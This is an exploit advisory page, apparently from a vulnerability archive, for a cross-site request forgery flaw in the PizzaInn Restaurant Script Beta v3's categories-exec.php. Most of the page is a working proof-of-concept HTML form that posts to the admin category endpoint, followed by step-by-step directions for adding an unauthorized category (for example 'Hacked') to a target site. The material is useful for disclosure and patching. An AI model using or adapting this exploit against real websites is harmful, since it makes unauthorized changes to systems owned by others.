PizzaInn Beta 3 categories-exec.php Cross Site Request Forgery

2016.10.21
Credit: Nassim Asrir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title :----------------- : PizzaInn Restaurant Scripti (Beta v3) - (categories-exec.php) - CSRF Add Category # Author :------------------------ : Nassim Asrir # Author Company :------------------------ : HenceForth # Author Email :------------------------ : wassline@gmail.com # Google Dork :---------------- : - # Date :-------------------------- : 20/10/2016 # Type :-------------------------- : webapps # Platform : -------------------- : PHP # Software link : -------------- : http://wmscripti.com/php-scriptler/pizzainn-restaurant-scripti-beta-v3.html ############################ CSRF Add Category Vulnerabilty ############################ ## Exploit ## <html> <title>CSRF Exploit By Nassim Asrir</title> <CAPTION><h3>ADD A NEW CATEGORY</h3></CAPTION> <form name="categoryForm" id="categoryForm" action="http://Site/script/admin/categories-exec.php" method="post" onsubmit="return categoriesValidate(this)"> <tr> <th>Name</th> </tr> <tr> <td><input type="text" name="name" class="textfield" /></td> <td><input type="submit" name="Submit" value="Add" /></td> </tr> </form> </table> </html> ## Proc ## - Create a .html File and Put the Code. - Navigate the File in your Localhost . - and create name of category (ex . Hacked) and you redirect to http://site/script/admin/access-denied.php - and You get the Message "Access Denied! You do not have access to this resource." but don't worry. when you get the Message go to home site and navigate "Food Zone" . and you can see a List named Category click in it and you can see your category added successfuly.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top